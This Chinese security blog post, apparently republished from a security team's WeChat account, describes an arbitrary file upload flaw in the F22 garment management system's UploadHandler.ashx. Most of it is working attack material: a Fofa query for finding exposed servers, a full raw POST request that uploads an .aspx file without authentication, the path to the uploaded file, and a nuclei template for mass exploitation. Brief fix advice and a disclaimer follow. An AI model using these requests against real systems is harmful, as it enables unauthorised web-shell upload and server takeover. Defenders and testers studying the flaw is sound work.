F22服装管理软件系统UploadHandler.ashx任意文件上传漏洞

admin

102936
文章

87
评论

2023年12月4日11:17:22评论50 views字数 2648阅读8分49秒阅读模式

F22服装管理软件系统UploadHandler.ashx任意文件上传漏洞

@精英打工人们

漏洞描述

广州锦铭泰软件科技有限公司开发的F22服装管理软件系统/CuteSoft_Client/UploadHandler.ashx接口存在任意文件上传漏洞，由于系统对用户上传的文件类型未作任何过滤和限制，未授权的攻击者可以通过此接口上传恶意后门文件获取服务器信息或权限。

@精英打工人们

漏洞复现

步骤一：使用以下语法进行资产搜索并确定要测试的目标...

# Fofa语法body="F22WEB登陆"

步骤二：首页抓取数据包并修改如下进行放包测试....返回时间戳命名的aspx文件说明上传成功！！！

POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1Host:IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoixContent-Length: 409
------------398jnjVTTlDVXHlE7yYnfwBoixContent-Disposition: form-data; name="folder"
/upload/udplog------------398jnjVTTlDVXHlE7yYnfwBoixContent-Disposition: form-data; name="Filedata"; filename="1.aspx"Content-Type: application/octet-stream
hello------------398jnjVTTlDVXHlE7yYnfwBoixContent-Disposition: form-data; name="Upload"
Submit Query------------398jnjVTTlDVXHlE7yYnfwBoix--

F22服装管理软件系统UploadHandler.ashx任意文件上传漏洞

步骤三：将上传成功的文件进行路径拼接并在浏览器中访问，回显有内容则说明上传成功！

# 拼接路径http://ip/upload/udplog/20231130123414718.aspx

@精英打工人们

批量脚本

id: F22-UploadHandler-fileuploadinfo:  name: F22服装管理软件系统UploadHandler.ashx任意文件上传漏洞  author: xy  severity: critical  description: 'F22服装管理软件系统/CuteSoft_Client/UploadHandler.ashx接口存在任意文件上传漏洞，由于系统对用户上传的文件类型未作任何过滤和限制，未授权的攻击者可以通过此接口上传恶意后门文件获取服务器信息或权限。'  tags: 2023, F22, fileupload  metadata:    max-request: 1    fofa-query: body="F22WEB登陆"    verified: true
http:  - raw:      - |        POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1        Host: {{Hostname}}        Accept-Language: zh-CN,zh;q=0.9        Content-Type: multipart/form-data; boundary=----------{{randstr}}        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36        Accept: */*        Accept-Encoding: gzip, deflate                ------------{{randstr}}        Content-Disposition: form-data; name="folder"                /upload/udplog        ------------{{randstr}}        Content-Disposition: form-data; name="Filedata"; filename="1.aspx"        Content-Type: application/octet-stream                {{randstr}}        ------------{{randstr}}        Content-Disposition: form-data; name="Upload"                Submit Query        ------------{{randstr}}--
      - |        GET /upload/udplog/{{replace(file_name,'1,','')}} HTTP/1.1        Host: {{Hostname}}
    extractors:      - type: dsl        internal: true        name: file_name        dsl:          - body    matchers:      - type: dsl        dsl:          - "status_code_1 == 200 && contains(body_1, 'aspx') && st          atus_code_2 == 200 && contains(body_2, '{{randstr}}')"

@精英打工人们

漏洞修复

* 配置访问控制策略：对路径 /CuteSoft_Client/UploadHandler.ashx 进行限制访问
* 联系厂商获取最新补丁信息：http://www.x2erp.com/
* 白名单检查文件扩展名

揽月安全团队发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！！！！！

原文始发于微信公众号（揽月安全团队）：F22服装管理软件系统UploadHandler.ashx任意文件上传漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

F22服装管理软件系统UploadHandler.ashx任意文件上传漏洞

物联网安全篇——Sapido RB-1732路由器命令执行漏洞

【漏洞复现】kkFileView任意文件上传漏洞（QVD-2024-14703）

【漏洞复现】kkFileView任意文件读取漏洞（CVE-2021-43734）

(0day)迅饶科技 X2View物联网设备存在任意用户添加漏洞

世纪信通-LoginForm2-sql注入漏洞复现

用友crm客户关系管理pub/downloadfile.php接口存在任意文件读取漏洞

CVE-2024-33786 中城科信票务管理平台任意文件上传

CVE-2024-1512

CVE-2024-1698

CVE-2024-28253 :OpenMetadata

发表评论

在线咨询

微信